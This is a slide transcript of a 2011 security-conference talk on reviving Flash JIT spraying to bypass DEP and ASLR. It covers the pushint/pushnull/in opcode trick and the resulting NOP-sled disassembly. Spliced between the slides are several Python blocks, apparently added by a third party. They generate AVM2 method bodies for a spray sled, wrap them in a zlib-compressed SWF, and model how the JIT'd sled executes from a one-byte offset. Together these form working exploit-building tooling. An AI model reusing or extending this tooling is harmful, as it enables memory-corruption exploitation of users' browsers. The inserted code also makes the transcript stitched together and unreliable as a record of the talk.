The Flash JIT Spraying is Back


Transcript of The Flash JIT Spraying is Back

Page 1: The Flash JIT Spraying is Back

The Flash JIT Spraying is Back: Hints for Flash Vulnerability Researchers

Ming-chieh Pan (Nanika) <[email protected]>, Senior vulnerability researcher, Net-Hack Inc.

Sung-ting Tsai (TT) <[email protected]>, Staff Research Engineer, Trend Micro.

Page 2: The Flash JIT Spraying is Back

XOR Trick (Dion Blazakis, BHDC 2010): http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf

• 0x3C909090 ^ 0x3C909090 ^ 0x3C909090 ^ 0x3C909090 ^ …
• The JIT emits each term as 35 90 90 90 3C (XOR EAX, 0x3C909090). Entered one byte in, the same bytes disassemble as:
• 0x1A1A0101: 90 NOP
• 0x1A1A0102: 90 NOP
• 0x1A1A0103: 90 NOP
• 0x1A1A0104: 3C35 CMP AL, 35 (the CMP swallows the next XOR opcode byte as its immediate, so the sled continues into the next term)

Page 3: The Flash JIT Spraying is Back

XOR JIT Spraying doesn't work in Flash 10.1

• @asintsov: No JIT-SPRAY in Flash 10.1. Pages with code are encrypted )) But the idea will never die, as I showed at HITB in AMS)

• Jun 13, 2010 6:18 AM

Page 4: The Flash JIT Spraying is Back

Flash JIT Hacking

• Flash parser tool: https://github.com/sporst/SWFREtools/

• We need an easy way to set a breakpoint in the JIT code to observe the memory.

• Using our AVM fuzzer, we found a new way to make JIT spraying work.

• Magic number: 0x2d 0x01 0x20 0xb4 (pushint with index 1, pushnull, in; see the next three pages)

Page 5: The Flash JIT Spraying is Back

Magic Number - pushint

• Push an int value onto the stack.
• Format: pushint index
• Forms: pushint = 45 (0x2d)
• Stack: … => …, value
• Bytes: 0x2d 0x01 (index 1 into the integer constant pool)

Page 6: The Flash JIT Spraying is Back

index

• Index 1 -> 60178 (0xEB12): the integer constant pool entry that pushint 1 pushes

Page 7: The Flash JIT Spraying is Back

Magic Number - pushnull

• Push null.
• Format: pushnull
• Forms: pushnull = 32 (0x20)
• Stack: … => …, null
• Bytes: 0x20

Page 8: The Flash JIT Spraying is Back

Magic Number - in

• Determine whether an object has a named property.
• Format: in
• Forms: in = 180 (0xb4)
• Stack: …, name, obj => …, result
• Bytes: 0xb4

Page 9: The Flash JIT Spraying is Back

AVM code insert (modify)

• Select a method body.
• Change its code to pushint / pushnull / in.

Page 10: The Flash JIT Spraying is Back

Breakpoint

• A second pushnull can crash Flash; use that crash as the breakpoint.
• Set OllyDbg as the just-in-time debugger.
• Focus on [ESP+C].

Page 11: The Flash JIT Spraying is Back

[ESP+C]

• It points into our JIT code page, which we can then analyze.
• Remember pushint/pushnull/in? This is what the JIT compiled it to:
• Push eb12
• Push 1
• Call 007b7c80

Page 12: The Flash JIT Spraying is Back

Ideas never die

• Can we control it?
• Try to put another integer.
• Try to put 2 pushint.

Page 13: The Flash JIT Spraying is Back

JIT again: bypass DEP

Entered one byte past each PUSH opcode, the two PUSH immediates read as three NOPs, a CMP AL,68 that eats the next PUSH opcode, DEC ESI, and a short jump over the MOV/CALL into the next block, one byte in again:

• 0291C019 90 NOP
• 0291C01A 90 NOP
• 0291C01B 90 NOP
• 0291C01C 3C 68 CMP AL,68
• 0291C01E 4E DEC ESI
• 0291C01F EB 09 JMP SHORT 0291C02A

• 0291C02A 90 NOP
• 0291C02B 90 NOP
• 0291C02C 90 NOP
• 0291C02D 3C 68 CMP AL,68
• 0291C02F 4E DEC ESI
• 0291C030 EB 09 JMP SHORT 0291C03B

Page 14: The Flash JIT Spraying is Back

Bypass ASLR

• Spraying with a large number of push opcodes might be a problem.
• It needs a lot of push opcodes.
• It needs the AVM struct's max_stack (the field in method_body_info) raised to match the pushes.
• When max_stack is more than 2047, it could fail.
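The ABC-level side of pages 9, 12 and 14, as an added example that is not the authors' fuzzer or tool: it emits a method_body_info whose code is the pushint/pushint/in unit repeated, computes the operand-stack depth the verifier's max_stack has to cover, and refuses to go past the 2047 limit the slide reports. The opcode numbers and the u30 layout are the ones the slides quote from the AVM2 overview; the method index, the constant-pool indexes and the optional pop variant are this example's own assumptions.

```python
"""Emit an AVM2 method body for JIT spraying (added example, not the authors' tool)."""

# Opcodes named on the slides (values from the AVM2 overview).
OP_JUMP = 0x10        # jump s24
OP_PUSHNULL = 0x20
OP_POP = 0x29
OP_PUSHINT = 0x2D     # pushint u30 (index into the integer constant pool)
OP_RETURNVOID = 0x47
OP_IN = 0xB4

MAX_STACK_LIMIT = 2047   # slide 14: a max_stack above this "could fail"

# Operand-stack effect (pushes minus pops) of every opcode this example emits.
STACK_EFFECT = {OP_PUSHINT: +1, OP_PUSHNULL: +1, OP_IN: -1,
                OP_POP: -1, OP_JUMP: 0, OP_RETURNVOID: 0}


def u30(value):
    """ABC variable-length unsigned int: 7 payload bits per byte, MSB set = more bytes follow."""
    if not 0 <= value < (1 << 30):
        raise ValueError("u30 out of range: %d" % value)
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def read_u30(code, pos):
    """Inverse of u30(); returns (value, position after the field)."""
    value, shift = 0, 0
    while True:
        byte = code[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, pos


def sled_code(idx_a, idx_b, repeats, pop_results=False):
    """pushint idx_a; pushint idx_b; in  -- repeated, then returnvoid.

    The slides leave every `in` result on the operand stack, so the stack grows by
    one per unit; pop_results=True is this example's variation that pops it instead
    (assumed here to keep the verifier's depth at 2 instead of repeats + 1).
    """
    unit = bytes([OP_PUSHINT]) + u30(idx_a) + bytes([OP_PUSHINT]) + u30(idx_b) + bytes([OP_IN])
    if pop_results:
        unit += bytes([OP_POP])
    return unit * repeats + bytes([OP_RETURNVOID])


def max_operand_depth(code):
    """Walk the straight-line code and return the deepest operand stack it reaches."""
    depth = peak = pos = 0
    while pos < len(code):
        op = code[pos]
        pos += 1
        if op == OP_PUSHINT:
            _, pos = read_u30(code, pos)        # skip the constant-pool index operand
        elif op == OP_JUMP:
            pos += 3                            # s24 offset (only +0 is emitted here)
        depth += STACK_EFFECT[op]
        if depth < 0:
            raise ValueError("operand stack underflow before offset %d" % pos)
        peak = max(peak, depth)
    return peak


def method_body_info(method_index, code, max_stack, local_count=1,
                     init_scope_depth=0, max_scope_depth=1):
    """Serialize a method_body_info record with no exceptions and no traits."""
    if max_stack > MAX_STACK_LIMIT:
        raise ValueError("max_stack %d exceeds the %d limit" % (max_stack, MAX_STACK_LIMIT))
    return (u30(method_index) + u30(max_stack) + u30(local_count)
            + u30(init_scope_depth) + u30(max_scope_depth)
            + u30(len(code)) + code + u30(0) + u30(0))


def build_sled_body(method_index, idx_a, idx_b, repeats, pop_results=False):
    """Method body whose max_stack is derived from the code it carries."""
    code = sled_code(idx_a, idx_b, repeats, pop_results)
    return method_body_info(method_index, code, max_operand_depth(code))


def fits_max_stack(repeats, pop_results=False):
    """True when a sled of this length stays within the 2047 max_stack limit."""
    return max_operand_depth(sled_code(1, 2, repeats, pop_results)) <= MAX_STACK_LIMIT


if __name__ == "__main__":
    body = build_sled_body(0, 1, 2, 1000)         # indexes 1 and 2 are assumed pool slots
    print("%d bytes, max_stack %d" % (len(body), max_operand_depth(sled_code(1, 2, 1000))))
```

The returned record still has to be spliced into an abcFile (constant pool, method_info, and a method that actually gets invoked so the JIT compiles it), which SWFREtools or the authors' own modifier does; this block only shows why the stack depth, not the byte count, is what runs into the 2047 limit.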

Page 15: The Flash JIT Spraying is Back

File Size and Zlib

• Spraying more method bodies makes the file large.
• Zlib helps: 20.5 MB -> 71.9 KB
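The packaging step behind page 15, as an added example that is not the authors' code: wrap the sprayed ABC data in a DoABC tag inside a minimal SWF, then turn the uncompressed FWS file into a zlib-compressed CWS file (the 8-byte header stays in the clear and FileLength keeps the uncompressed size). The frame header bytes, the tag name and the repeated placeholder payload are this example's constructions; the payload is only the method-body bytes repeated, not a valid abcFile.

```python
"""Wrap sprayed ABC data in a SWF and zlib-compress it (added example, not the authors' code)."""
import struct
import zlib

DOABC_TAG = 82   # SWF tag code for DoABC
END_TAG = 0
# Constructed frame header: 550x400 RECT, 12 fps (8.8 fixed), 1 frame.
FRAME_HEADER = bytes.fromhex("7800055f00000fa000" "000c" "0100")


def swf_tag(code, body):
    """RECORDHEADER: short form when the body is under 63 bytes, else 0x3F + UI32 length."""
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body


def doabc_tag(abc, name=b"", lazy=True):
    """DoABC: UI32 flags (bit 0 = lazy initialize), null-terminated name, ABC data."""
    return swf_tag(DOABC_TAG, struct.pack("<I", 1 if lazy else 0) + name + b"\x00" + abc)


def assemble_swf(tags, version=10):
    """Uncompressed SWF: 'FWS', version, FileLength (whole file), frame header, tags, End."""
    body = FRAME_HEADER + b"".join(tags) + swf_tag(END_TAG, b"")
    return b"FWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + body


def header_length(swf):
    """The FileLength field; for CWS it is still the uncompressed size."""
    return struct.unpack_from("<I", swf, 4)[0]


def compress_swf(swf):
    """FWS -> CWS: keep the 8-byte header, deflate everything after it."""
    if swf[:3] != b"FWS":
        raise ValueError("not an uncompressed SWF")
    return b"CWS" + swf[3:8] + zlib.compress(swf[8:], 9)


def decompress_swf(swf):
    """CWS -> FWS, checking that FileLength matches what was inflated."""
    if swf[:3] != b"CWS":
        raise ValueError("not a zlib-compressed SWF")
    out = b"FWS" + swf[3:8] + zlib.decompress(swf[8:])
    if len(out) != header_length(out):
        raise ValueError("FileLength does not match the decompressed size")
    return out


def sprayed_swf(unit, repeats):
    """Constructed stand-in for a sprayed ABC: the same method-body bytes repeated
    (not a valid abcFile; a real one carries the constant pool, method records, etc.)."""
    return assemble_swf([doabc_tag(unit * repeats, b"spray")])


if __name__ == "__main__":
    unit = bytes([0x2D, 0x01, 0x2D, 0x02, 0xB4])   # pushint 1; pushint 2; in
    fws = sprayed_swf(unit, 200000)
    cws = compress_swf(fws)
    print("FWS %d bytes -> CWS %d bytes" % (len(fws), len(cws)))
```

Repeated method bodies are almost free once deflated, which is the 20.5 MB to 71.9 KB figure on the slide; the player inflates the full size again in memory, so the spray itself is unaffected.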

Page 16: The Flash JIT Spraying is Back

File Size Spraying

Page 17: The Flash JIT Spraying is Back

Control the MEM

Page 18: The Flash JIT Spraying is Back

Reliable?

• 68 9090903C PUSH 3C909090
• 68 4EEB0900 PUSH 9EB4E
• 8BCB MOV ECX,EBX
• E8 527CCAFD CALL flash.007B7C80
• Success rate: 6/17 = 35% ↓
• We need more luck!

Page 19: The Flash JIT Spraying is Back

Another NOP JIT code

• jump
• Format: jump offset
• Forms: jump = 16 (0x10)
• Stack: … => …
• Bytes: 0x10 00 00 00 (a zero s24 offset)

Page 20: The Flash JIT Spraying is Back

JIT NOP

• 0140B1DC 00EB ADD BL,CH
• 0140B1DE 00EB ADD BL,CH
• 0140B1E0 00EB ADD BL,CH

• Success rate: 1/2 = 50% ↓
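The native side of pages 2, 13, 18 and 20, as an added example that is not the authors' code: model the bytes the slides show the JIT emitting for the XOR terms, for pushint/pushint/in (PUSH imm32, PUSH imm32, MOV ECX,EBX, CALL helper) and for jump +0 (EB 00, as slide 20's disassembly implies), then walk each sled from one byte in with a decoder that covers only this opcode subset. The walk reports whether control reaches the end of the sled, escapes into the CALL, or stops on a partial last instruction whose completion depends on whatever the JIT emits next (which the slides do not show). The base address is the one on slide 13, so the CALL displacement is computed rather than copied from slide 18.

```python
"""Model the JIT'd sleds from the slides and walk them from a one-byte offset (added example)."""
import struct

CALL_TARGET = 0x007B7C80   # helper the JIT'd `in` calls (slides 11 and 18)


def jit_in_block(imm_a, imm_b, addr):
    """pushint a; pushint b; in  ->  PUSH a; PUSH b; MOV ECX,EBX; CALL helper (slides 13/18).
    addr is where the block is placed; it only feeds the CALL's rel32."""
    code = b"\x68" + struct.pack("<I", imm_a) + b"\x68" + struct.pack("<I", imm_b) + b"\x8b\xcb"
    rel32 = (CALL_TARGET - (addr + len(code) + 5)) & 0xFFFFFFFF
    return code + b"\xe8" + struct.pack("<I", rel32)


def jit_in_sled(imm_a, imm_b, base, repeats):
    out = bytearray()
    for _ in range(repeats):
        out += jit_in_block(imm_a, imm_b, base + len(out))
    return bytes(out)


def jit_xor_sled(imm, repeats):
    """MOV EAX, imm32 followed by repeated XOR EAX, imm32 (the BHDC 2010 trick, slide 2)."""
    return b"\xb8" + struct.pack("<I", imm) + (b"\x35" + struct.pack("<I", imm)) * repeats


def jit_jump_sled(repeats):
    """Assumption from slide 20: every `jump +0` becomes JMP SHORT $+2 (EB 00)."""
    return b"\xeb\x00" * repeats


def decode(code, off):
    """Decode one instruction of the subset these sleds produce.
    Returns (length, mnemonic, jump_target); jump_target is None unless it is a JMP."""
    op = code[off]
    if op == 0x90:
        return 1, "NOP", None
    if op == 0x4E:
        return 1, "DEC ESI", None
    if op == 0x3C:
        return 2, "CMP AL,%02X" % code[off + 1], None
    if op == 0xEB:
        rel = struct.unpack_from("<b", code, off + 1)[0]
        return 2, "JMP SHORT %+d" % rel, off + 2 + rel
    if op == 0x00 and code[off + 1] == 0xEB:       # ADD r/m8,r8 with modrm EB
        return 2, "ADD BL,CH", None
    if op == 0x8B and code[off + 1] == 0xCB:
        return 2, "MOV ECX,EBX", None
    if op in (0x68, 0xB8, 0x35):
        name = {0x68: "PUSH", 0xB8: "MOV EAX,", 0x35: "XOR EAX,"}[op]
        return 5, "%s %08X" % (name, struct.unpack_from("<I", code, off + 1)[0]), None
    if op == 0xE8:
        return 5, "CALL", None
    raise ValueError("opcode %02X at offset %d is not modelled" % (op, off))


def walk(code, start):
    """Follow the instruction stream from `start`. Returns (trace, reason):
    'end' = ran off the end of the sled, 'call' = control left the sprayed page,
    'truncated' = last instruction needs bytes beyond the sled, 'undecodable' = unknown opcode."""
    trace, off = [], start
    while off < len(code):
        try:
            length, mnemonic, target = decode(code, off)
        except ValueError:
            return trace, "undecodable"
        except (IndexError, struct.error):
            return trace, "truncated"
        trace.append((off, mnemonic))
        if mnemonic == "CALL":
            return trace, "call"
        off = target if target is not None else off + length
    return trace, "end"


if __name__ == "__main__":
    base = 0x0291C018                 # slide 13: first NOP is at 0291C019
    sled = jit_in_sled(0x3C909090, 0x0009EB4E, base, 2)
    trace, reason = walk(sled, 1)
    for off, mnemonic in trace:
        print("%08X  %s" % (base + off, mnemonic))
    print(reason)
```

Entering the `in` sled at offset 0 runs straight into the CALL, which is the 65% of landings on slide 18 that miss; entering at offset 1 chains through every block. The jump sled walked from an odd offset is all ADD BL,CH, but its final stray 00 pairs with whatever byte follows the sled, so what the JIT emits after it decides whether the last instruction is still harmless.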

Page 21: The Flash JIT Spraying is Back

Conclusion

• Our hints might help you find useful Flash opcodes.

• The in opcode is similar to XOR.

• More techniques are coming soon.

Page 22: The Flash JIT Spraying is Back

Hacks in Taiwan Conference 2011: http://www.hitcon.org/hit2011/en/